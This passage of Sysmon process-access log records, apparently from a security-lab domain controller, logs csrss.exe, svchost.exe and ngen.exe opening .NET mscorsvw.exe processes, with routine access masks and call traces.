\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.388\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001098A90B00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.388","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001098A90B00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.403\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010832E0D00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.403","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010832E0D00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.434\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010FC310D00}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.434","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010FC310D00}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.434\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010FC310D00}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.434","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010FC310D00}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.434\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010FC310D00}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.434","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010FC310D00}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.466\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-001063350D00}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.466","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-001063350D00}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.466\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-001063350D00}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.466","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-001063350D00}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.481\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-001063350D00}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.481","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-001063350D00}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\W